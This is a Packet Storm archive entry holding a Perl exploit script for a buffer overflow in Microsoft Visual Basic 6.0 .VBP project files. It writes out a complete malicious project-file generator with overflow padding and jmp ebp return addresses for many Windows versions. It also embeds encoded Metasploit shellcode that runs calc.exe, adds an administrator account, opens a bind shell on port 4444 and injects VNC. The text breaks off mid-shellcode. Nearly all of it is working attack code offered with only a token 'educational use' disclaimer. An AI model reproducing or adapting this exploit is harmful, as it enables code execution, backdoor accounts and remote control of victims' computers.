{"id": "PACKETSTORM:59048", "type": "packetstorm", "bulletinFamily": "exploit", "title": "msvb-codeexec.txt", "description": "", "published": "2007-09-05T00:00:00", "modified": "2007-09-05T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/59048/msvb-codeexec.txt.html", "reporter": "koshi", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:22:42", "viewCount": 2, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-03T10:22:42", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:42", "rev": 2}, "vulnersScore": -0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/59048/msvb-codeexec.txt", "sourceData": "`#!/usr/bin/perl \n#' ++ Microsoft Visual Basic 6.0 Code Execution 0-Day ++ \n#' ++++++++++++++++++++++++++++++++++++++++++++++++++++++ \n#'++ Author: Koshi + \n#'++ Email: heykoshi at gmail dot com + \n#'++ Application: Microsoft Visual Basic 6.0 + \n#'++ + \n#'++ Tested on Microsoft Windows XP Home Edition SP2 + \n#'++ Patched & Updated + \n#'++ + \n#'++ The vulnerable buffer exsists in the .VBP files of + \n#'++ Visual Basic projects. You can jump directly to + \n#'++ the shellcode, or jump to it via EBP. + \n#'++ + \n#'++ There is NO restriction of shellcode size either. + \n#'++ + \n#'++ Gr33tz: Rima my baby who I love and adore, Draven + \n#'++ for pointing me in the right direction, as always. + \n#'++ + \n#'++ + \n#'++ This exploit is for educational use only, blah. + \n#'++ + \n#'++ + \n#'+++++++++++++++++++++++++++++++++++++++++++++++++++++++ \n#'+++++++++++++++++++++++++++++++++++++++++++++++++++++ \n# \n# Ex. of Usage: \n# perl vb6.pl 1 >>Project.vbp \n# \n# \n$begin0 = \"\\x54\\x79\\x70\\x65\\x3D\\x45\\x78\\x65\\x0D\\x0A\\x46\\x6F\\x72\\x6D\". \n\"\\x3D\\x46\\x6F\\x72\\x6D\\x31\\x2E\\x66\\x72\\x6D\\x0D\\x0A\"; \n \n$begin1 = \"\\x52\\x65\\x66\\x65\\x72\\x65\\x6E\\x63\\x65\\x3D\". 
\n\"\\x2A\\x5C\\x47\\x7B\\x30\\x30\\x30\\x32\\x30\\x34\\x33\\x30\\x2D\\x30\". \n\"\\x30\\x30\\x30\\x2D\\x30\\x30\\x30\\x30\\x2D\\x43\\x30\\x30\\x30\\x2D\". \n\"\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x30\\x34\\x36\\x7D\\x23\". \n\"\\x32\\x2E\\x30\\x23\\x30\\x23\\x2E\\x2E\\x5C\\x2E\\x2E\\x5C\\x2E\\x2E\". \n\"\\x5C\\x2E\\x2E\\x5C\\x2E\\x2E\\x5C\\x57\\x49\\x4E\\x44\\x4F\\x57\\x53\". \n\"\\x5C\\x73\\x79\\x73\\x74\\x65\\x6D\\x33\\x32\\x5C\\x73\\x74\\x64\\x6F\". \n\"\\x6C\\x65\\x32\\x2E\\x74\\x6C\\x62\\x23\\x4F\\x4C\\x45\\x20\\x41\\x75\". \n\"\\x74\\x6F\\x6D\\x61\\x74\\x69\\x6F\\x6E\"; \n \n$begin2 = \"\\x0D\\x0A\\x53\\x74\\x61\\x72\\x74\\x75\\x70\\x3D\\x22\\x46\\x6F\\x72\\x6D\\x31\\x22\\x0D\\x0A\". \n\"\\x43\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x33\\x32\\x3D\\x22\\x22\"; \n \n$BuffOf = \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". 
\n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\"; \n \n$codeAddr = \"\\x83\\x25\\x40\\x01\"; \n# You can most likely use a call or a push, you could probably use them from kernel32.dll too. \n#* ntdll.dll - 0x7C923DA3 jmp Ebp **** Is the one i have used in this example. 
\n# 0x77f6d42f jmp ebp ntdll.dll (English / 5.2.3790.3) Windows 2003 Server 5.2.0.0 SP0 (IA32) \n# 0x77f7d9b6 jmp ebp ntdll.dll (English / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32) \n# 0x77f8c449 jmp ebp ntdll.dll (English / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32) \n# 0x77faa6ce jmp ebp ntdll.dll (English / 5.2.3790.3) Windows 2003 Server 5.2.0.0 SP0 (IA32) \n# 0x7c85eb73 jmp ebp ntdll.dll (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32) \n# 0x7c8839ed jmp ebp ntdll.dll (English / 5.2.3790.1830031) Windows 2003 Server 5.2.1.0 SP1 (IA32) \n#*0x7c923da3 jmp ebp ntdll.dll (English / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32) \n# 0x77f8c449 jmp ebp ntdll.dll (French / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32) \n# 0x77f6d9b6 jmp ebp ntdll.dll (German / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32) \n# 0x7c933da3 jmp ebp ntdll.dll (German / 5.1.2600.21802) Windows XP 5.1.2.0 SP2 (IA32) \n# 0x77f5d42f jmp ebp ntdll.dll (Italian / 5.2.3790.3) No associated versions \n# 0x77f6d9b6 jmp ebp ntdll.dll (Italian / 5.1.2600.11061) Windows XP 5.1.1.0 SP1 (IA32) \n# 0x77f8c449 jmp ebp ntdll.dll (Italian / 5.0.2163.1) Windows 2000 5.0.0.0 SP0 (IA32) \n# 0x77f9a6ce jmp ebp ntdll.dll (Italian / 5.2.3790.3) No associated versions \n# 0x7c96eb73 jmp ebp ntdll.dll (Italian / 5.2.3790.1830031) No associated versions \n# 0x7c9939ed jmp ebp ntdll.dll (Italian / 5.2.3790.1830031) No associated versions \n# ...backwards..if you don't know why, then gtfo. \n$jmpEbp = \"\\xA3\\x3D\\x92\\x7C\"; \n$fourSkin = \"\\x44\\x44\\x44\\x44\"; \n \n \n$begin3 = \"\\x0D\\x0A\\x4E\\x61\\x6D\\x65\\x3D\\x22\\x50\\x72\\x6F\\x6A\\x65\\x63\". \n\"\\x74\\x31\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\". \n\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"; \n \n$koshi = \"\\x0D\\x0A\\x48\\x65\\x6C\\x70\\x43\\x6F\\x6E\\x74\\x65\\x78\\x74\\x49\\x44\\x3D\\x22\\x30\\x22\\x0D\\x0A\\x43\\x6F\\x6D\". 
\n\"\\x70\\x61\\x74\\x69\\x62\\x6C\\x65\\x4D\\x6F\\x64\\x65\\x3D\\x22\\x30\\x22\\x0D\\x0A\\x4D\\x61\\x6A\\x6F\\x72\\x56\\x65\". \n\"\\x72\\x3D\\x31\\x0D\\x0A\\x4D\\x69\\x6E\\x6F\\x72\\x56\\x65\\x72\\x3D\\x30\\x0D\\x0A\\x52\\x65\\x76\\x69\\x73\\x69\\x6F\". \n\"\\x6E\\x56\\x65\\x72\\x3D\\x30\\x0D\\x0A\\x41\\x75\\x74\\x6F\\x49\\x6E\\x63\\x72\\x65\\x6D\\x65\\x6E\\x74\\x56\\x65\\x72\". \n\"\\x3D\\x30\\x0D\\x0A\\x53\\x65\\x72\\x76\\x65\\x72\\x53\\x75\\x70\\x70\\x6F\\x72\\x74\\x46\\x69\\x6C\\x65\\x73\\x3D\\x30\". \n\"\\x0D\\x0A\\x43\\x6F\\x6D\\x70\\x69\\x6C\\x61\\x74\\x69\\x6F\\x6E\\x54\\x79\\x70\\x65\\x3D\\x30\\x0D\\x0A\\x4F\\x70\\x74\". \n\"\\x69\\x6D\\x69\\x7A\\x61\\x74\\x69\\x6F\\x6E\\x54\\x79\\x70\\x65\\x3D\\x30\\x0D\\x0A\\x46\\x61\\x76\\x6F\\x72\\x50\\x65\". \n\"\\x6E\\x74\\x69\\x75\\x6D\\x50\\x72\\x6F\\x28\\x74\\x6D\\x29\\x3D\\x30\\x0D\\x0A\\x43\\x6F\\x64\\x65\\x56\\x69\\x65\\x77\". \n\"\\x44\\x65\\x62\\x75\\x67\\x49\\x6E\\x66\\x6F\\x3D\\x30\\x0D\\x0A\\x4E\\x6F\\x41\\x6C\\x69\\x61\\x73\\x69\\x6E\\x67\\x3D\". \n\"\\x30\\x0D\\x0A\\x42\\x6F\\x75\\x6E\\x64\\x73\\x43\\x68\\x65\\x63\\x6B\\x3D\\x30\\x0D\\x0A\\x4F\\x76\\x65\\x72\\x66\\x6C\". \n\"\\x6F\\x77\\x43\\x68\\x65\\x63\\x6B\\x3D\\x30\\x0D\\x0A\\x46\\x6C\\x50\\x6F\\x69\\x6E\\x74\\x43\\x68\\x65\\x63\\x6B\\x3D\". \n\"\\x30\\x0D\\x0A\\x46\\x44\\x49\\x56\\x43\\x68\\x65\\x63\\x6B\\x3D\\x30\\x0D\\x0A\\x55\\x6E\\x72\\x6F\\x75\\x6E\\x64\\x65\". \n\"\\x64\\x46\\x50\\x3D\\x30\\x0D\\x0A\\x53\\x74\\x61\\x72\\x74\\x4D\\x6F\\x64\\x65\\x3D\\x30\\x0D\\x0A\\x55\\x6E\\x61\\x74\". \n\"\\x74\\x65\\x6E\\x64\\x65\\x64\\x3D\\x30\\x0D\\x0A\\x52\\x65\\x74\\x61\\x69\\x6E\\x65\\x64\\x3D\\x30\\x0D\\x0A\\x54\\x68\". \n\"\\x72\\x65\\x61\\x64\\x50\\x65\\x72\\x4F\\x62\\x6A\\x65\\x63\\x74\\x3D\\x30\\x0D\\x0A\\x4D\\x61\\x78\\x4E\\x75\\x6D\\x62\". \n\"\\x65\\x72\\x4F\\x66\\x54\\x68\\x72\\x65\\x61\\x64\\x73\\x3D\\x31\\x0D\\x0A\\x0D\\x0A\\x5B\\x4D\\x53\\x20\\x54\\x72\\x61\". 
\n\"\\x6E\\x73\\x61\\x63\\x74\\x69\\x6F\\x6E\\x20\\x53\\x65\\x72\\x76\\x65\\x72\\x5D\\x0D\\x0A\\x41\\x75\\x74\\x6F\\x52\\x65\". \n\"\\x66\\x72\\x65\\x73\\x68\\x3D\\x31\\x0D\\x0A\"; \n \n# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com \n$shellc1 = \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\". \n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\". \n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\". \n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\". \n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x34\". \n\"\\x42\\x50\\x42\\x30\\x42\\x50\\x4b\\x38\\x45\\x44\\x4e\\x43\\x4b\\x38\\x4e\\x47\". \n\"\\x45\\x30\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x48\\x4f\\x54\\x4a\\x41\\x4b\\x38\". \n\"\\x4f\\x55\\x42\\x52\\x41\\x30\\x4b\\x4e\\x49\\x54\\x4b\\x48\\x46\\x33\\x4b\\x48\". \n\"\\x41\\x50\\x50\\x4e\\x41\\x43\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x48\\x42\\x4c\". \n\"\\x46\\x47\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x50\\x44\\x4c\\x4b\\x4e\". \n\"\\x46\\x4f\\x4b\\x43\\x46\\x35\\x46\\x52\\x46\\x30\\x45\\x37\\x45\\x4e\\x4b\\x58\". \n\"\\x4f\\x45\\x46\\x42\\x41\\x50\\x4b\\x4e\\x48\\x46\\x4b\\x48\\x4e\\x30\\x4b\\x44\". \n\"\\x4b\\x48\\x4f\\x35\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x4b\\x38\\x4e\\x51\\x4b\\x38\". \n\"\\x41\\x50\\x4b\\x4e\\x49\\x38\\x4e\\x45\\x46\\x32\\x46\\x50\\x43\\x4c\\x41\\x33\". \n\"\\x42\\x4c\\x46\\x46\\x4b\\x48\\x42\\x34\\x42\\x33\\x45\\x38\\x42\\x4c\\x4a\\x47\". \n\"\\x4e\\x30\\x4b\\x38\\x42\\x34\\x4e\\x50\\x4b\\x58\\x42\\x47\\x4e\\x41\\x4d\\x4a\". \n\"\\x4b\\x58\\x4a\\x36\\x4a\\x30\\x4b\\x4e\\x49\\x50\\x4b\\x48\\x42\\x48\\x42\\x4b\". \n\"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x38\\x4a\\x56\\x4e\\x43\\x4f\\x55\\x41\\x33\". \n\"\\x48\\x4f\\x42\\x46\\x48\\x35\\x49\\x38\\x4a\\x4f\\x43\\x58\\x42\\x4c\\x4b\\x37\". 
\n\"\\x42\\x55\\x4a\\x36\\x42\\x4f\\x4c\\x58\\x46\\x50\\x4f\\x35\\x4a\\x36\\x4a\\x59\". \n\"\\x50\\x4f\\x4c\\x38\\x50\\x50\\x47\\x55\\x4f\\x4f\\x47\\x4e\\x43\\x56\\x41\\x56\". \n\"\\x4e\\x46\\x43\\x56\\x50\\x32\\x45\\x46\\x4a\\x37\\x45\\x36\\x42\\x50\\x5a\"; \n \n# win32_adduser - PASS=koshi EXITFUNC=seh USER=4dmin Size=495 Encoder=PexAlphaNum http://metasploit.com \n$shellc2 = \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\". \n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\". \n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\". \n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\". \n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x44\". \n\"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x48\\x45\\x44\\x4e\\x53\\x4b\\x38\\x4e\\x37\". \n\"\\x45\\x50\\x4a\\x47\\x41\\x50\\x4f\\x4e\\x4b\\x38\\x4f\\x54\\x4a\\x51\\x4b\\x58\". \n\"\\x4f\\x35\\x42\\x52\\x41\\x30\\x4b\\x4e\\x49\\x54\\x4b\\x38\\x46\\x53\\x4b\\x48\". \n\"\\x41\\x30\\x50\\x4e\\x41\\x53\\x42\\x4c\\x49\\x39\\x4e\\x4a\\x46\\x48\\x42\\x4c\". \n\"\\x46\\x57\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x30\\x44\\x4c\\x4b\\x4e\". \n\"\\x46\\x4f\\x4b\\x53\\x46\\x55\\x46\\x52\\x46\\x30\\x45\\x47\\x45\\x4e\\x4b\\x48\". \n\"\\x4f\\x45\\x46\\x42\\x41\\x50\\x4b\\x4e\\x48\\x46\\x4b\\x48\\x4e\\x50\\x4b\\x54\". \n\"\\x4b\\x48\\x4f\\x55\\x4e\\x51\\x41\\x50\\x4b\\x4e\\x4b\\x58\\x4e\\x51\\x4b\\x58\". \n\"\\x41\\x30\\x4b\\x4e\\x49\\x38\\x4e\\x55\\x46\\x42\\x46\\x30\\x43\\x4c\\x41\\x33\". \n\"\\x42\\x4c\\x46\\x46\\x4b\\x58\\x42\\x34\\x42\\x53\\x45\\x48\\x42\\x4c\\x4a\\x37\". \n\"\\x4e\\x30\\x4b\\x48\\x42\\x44\\x4e\\x30\\x4b\\x48\\x42\\x37\\x4e\\x51\\x4d\\x4a\". \n\"\\x4b\\x58\\x4a\\x36\\x4a\\x30\\x4b\\x4e\\x49\\x50\\x4b\\x48\\x42\\x48\\x42\\x4b\". \n\"\\x42\\x30\\x42\\x30\\x42\\x50\\x4b\\x58\\x4a\\x36\\x4e\\x53\\x4f\\x45\\x41\\x53\". 
\n\"\\x48\\x4f\\x42\\x36\\x48\\x45\\x49\\x38\\x4a\\x4f\\x43\\x48\\x42\\x4c\\x4b\\x57\". \n\"\\x42\\x55\\x4a\\x56\\x42\\x4f\\x4c\\x58\\x46\\x50\\x4f\\x55\\x4a\\x46\\x4a\\x59\". \n\"\\x50\\x4f\\x4c\\x58\\x50\\x30\\x47\\x35\\x4f\\x4f\\x47\\x4e\\x43\\x36\\x4d\\x46\". \n\"\\x46\\x56\\x50\\x42\\x45\\x36\\x4a\\x37\\x45\\x56\\x42\\x32\\x4f\\x52\\x43\\x46\". \n\"\\x42\\x42\\x50\\x56\\x45\\x46\\x46\\x47\\x42\\x52\\x45\\x47\\x43\\x37\\x45\\x36\". \n\"\\x44\\x57\\x42\\x42\\x46\\x53\\x46\\x36\\x4d\\x56\\x49\\x46\\x50\\x56\\x42\\x32\". \n\"\\x4b\\x36\\x4f\\x36\\x43\\x37\\x4a\\x46\\x49\\x36\\x42\\x32\\x4f\\x42\\x41\\x34\". \n\"\\x46\\x54\\x46\\x34\\x42\\x32\\x48\\x52\\x48\\x52\\x42\\x52\\x50\\x36\\x45\\x46\". \n\"\\x46\\x57\\x42\\x42\\x4e\\x56\\x4f\\x36\\x43\\x36\\x41\\x36\\x4e\\x46\\x47\\x56\". \n\"\\x44\\x37\\x4f\\x36\\x45\\x57\\x42\\x57\\x42\\x52\\x41\\x44\\x46\\x56\\x4d\\x56\". \n\"\\x49\\x46\\x50\\x56\\x49\\x46\\x43\\x47\\x46\\x57\\x44\\x37\\x41\\x36\\x46\\x57\". \n\"\\x4f\\x46\\x44\\x37\\x43\\x37\\x42\\x32\\x46\\x43\\x46\\x36\\x4d\\x56\\x49\\x36\". \n\"\\x50\\x56\\x42\\x42\\x4f\\x32\\x41\\x44\\x46\\x54\\x46\\x54\\x42\\x50\\x5a\"; \n \n# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com \n$shellc3 = \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\". \n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\". \n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\". \n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\". \n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4c\\x36\\x4b\\x4e\". \n\"\\x4d\\x44\\x4a\\x4e\\x49\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x4f\\x42\\x56\\x4b\\x38\". \n\"\\x4e\\x36\\x46\\x52\\x46\\x32\\x4b\\x38\\x45\\x54\\x4e\\x53\\x4b\\x48\\x4e\\x37\". \n\"\\x45\\x30\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x58\\x4f\\x44\\x4a\\x41\\x4b\\x58\". 
\n\"\\x4f\\x45\\x42\\x52\\x41\\x50\\x4b\\x4e\\x49\\x44\\x4b\\x58\\x46\\x33\\x4b\\x48\". \n\"\\x41\\x50\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x39\\x4e\\x4a\\x46\\x58\\x42\\x4c\". \n\"\\x46\\x37\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x30\\x41\\x50\\x44\\x4c\\x4b\\x4e\". \n\"\\x46\\x4f\\x4b\\x33\\x46\\x35\\x46\\x32\\x4a\\x32\\x45\\x57\\x45\\x4e\\x4b\\x48\". \n\"\\x4f\\x35\\x46\\x32\\x41\\x30\\x4b\\x4e\\x48\\x36\\x4b\\x58\\x4e\\x30\\x4b\\x54\". \n\"\\x4b\\x58\\x4f\\x35\\x4e\\x31\\x41\\x50\\x4b\\x4e\\x43\\x50\\x4e\\x52\\x4b\\x58\". \n\"\\x49\\x58\\x4e\\x46\\x46\\x52\\x4e\\x31\\x41\\x46\\x43\\x4c\\x41\\x33\\x4b\\x4d\". \n\"\\x46\\x46\\x4b\\x48\\x43\\x34\\x42\\x53\\x4b\\x58\\x42\\x54\\x4e\\x30\\x4b\\x48\". \n\"\\x42\\x57\\x4e\\x31\\x4d\\x4a\\x4b\\x48\\x42\\x44\\x4a\\x50\\x50\\x45\\x4a\\x46\". \n\"\\x50\\x38\\x50\\x34\\x50\\x50\\x4e\\x4e\\x42\\x55\\x4f\\x4f\\x48\\x4d\\x48\\x46\". \n\"\\x43\\x45\\x48\\x56\\x4a\\x36\\x43\\x53\\x44\\x33\\x4a\\x46\\x47\\x57\\x43\\x37\". \n\"\\x44\\x53\\x4f\\x55\\x46\\x35\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x4b\\x4c\\x4d\\x4e\". \n\"\\x4e\\x4f\\x4b\\x53\\x42\\x55\\x4f\\x4f\\x48\\x4d\\x4f\\x45\\x49\\x38\\x45\\x4e\". \n\"\\x48\\x36\\x41\\x58\\x4d\\x4e\\x4a\\x50\\x44\\x30\\x45\\x45\\x4c\\x36\\x44\\x50\". \n\"\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x49\\x4d\\x49\\x30\\x45\\x4f\\x4d\\x4a\\x47\\x45\". \n\"\\x4f\\x4f\\x48\\x4d\\x43\\x45\\x43\\x45\\x43\\x55\\x43\\x55\\x43\\x55\\x43\\x54\". \n\"\\x43\\x45\\x43\\x54\\x43\\x45\\x4f\\x4f\\x42\\x4d\\x48\\x46\\x4a\\x36\\x41\\x31\". \n\"\\x4e\\x35\\x48\\x46\\x43\\x55\\x49\\x58\\x41\\x4e\\x45\\x59\\x4a\\x46\\x46\\x4a\". \n\"\\x4c\\x41\\x42\\x47\\x47\\x4c\\x47\\x35\\x4f\\x4f\\x48\\x4d\\x4c\\x46\\x42\\x31\". \n\"\\x41\\x55\\x45\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x46\\x46\\x4a\\x4d\\x4a\\x50\\x32\". \n\"\\x49\\x4e\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x43\\x55\\x45\\x55\\x4f\\x4f\\x42\\x4d\". \n\"\\x4a\\x56\\x45\\x4e\\x49\\x44\\x48\\x38\\x49\\x34\\x47\\x55\\x4f\\x4f\\x48\\x4d\". 
\n\"\\x42\\x45\\x46\\x45\\x46\\x45\\x45\\x35\\x4f\\x4f\\x42\\x4d\\x43\\x59\\x4a\\x36\". \n\"\\x47\\x4e\\x49\\x47\\x48\\x4c\\x49\\x37\\x47\\x35\\x4f\\x4f\\x48\\x4d\\x45\\x45\". \n\"\\x4f\\x4f\\x42\\x4d\\x48\\x56\\x4c\\x36\\x46\\x56\\x48\\x46\\x4a\\x36\\x43\\x46\". \n\"\\x4d\\x36\\x49\\x38\\x45\\x4e\\x4c\\x46\\x42\\x35\\x49\\x45\\x49\\x32\\x4e\\x4c\". \n\"\\x49\\x48\\x47\\x4e\\x4c\\x56\\x46\\x54\\x49\\x48\\x44\\x4e\\x41\\x43\\x42\\x4c\". \n\"\\x43\\x4f\\x4c\\x4a\\x50\\x4f\\x44\\x54\\x4d\\x52\\x50\\x4f\\x44\\x54\\x4e\\x42\". \n\"\\x43\\x59\\x4d\\x38\\x4c\\x47\\x4a\\x43\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x36\". \n\"\\x44\\x47\\x50\\x4f\\x43\\x4b\\x48\\x41\\x4f\\x4f\\x45\\x47\\x46\\x54\\x4f\\x4f\". \n\"\\x48\\x4d\\x4b\\x45\\x47\\x45\\x44\\x35\\x41\\x35\\x41\\x45\\x41\\x55\\x4c\\x46\". \n\"\\x41\\x30\\x41\\x45\\x41\\x45\\x45\\x45\\x41\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x36\". \n\"\\x4d\\x4a\\x49\\x4d\\x45\\x30\\x50\\x4c\\x43\\x45\\x4f\\x4f\\x48\\x4d\\x4c\\x56\". \n\"\\x4f\\x4f\\x4f\\x4f\\x47\\x33\\x4f\\x4f\\x42\\x4d\\x4b\\x48\\x47\\x35\\x4e\\x4f\". \n\"\\x43\\x38\\x46\\x4c\\x46\\x36\\x4f\\x4f\\x48\\x4d\\x44\\x55\\x4f\\x4f\\x42\\x4d\". \n\"\\x4a\\x56\\x42\\x4f\\x4c\\x58\\x46\\x50\\x4f\\x55\\x43\\x45\\x4f\\x4f\\x48\\x4d\". \n\"\\x4f\\x4f\\x42\\x4d\\x5a\"; \n \n# win32_bind_vncinject - VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=649 Encoder=PexAlphaNum http://metasploit.com \n$shellc4 = \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\". \n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\". \n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\". 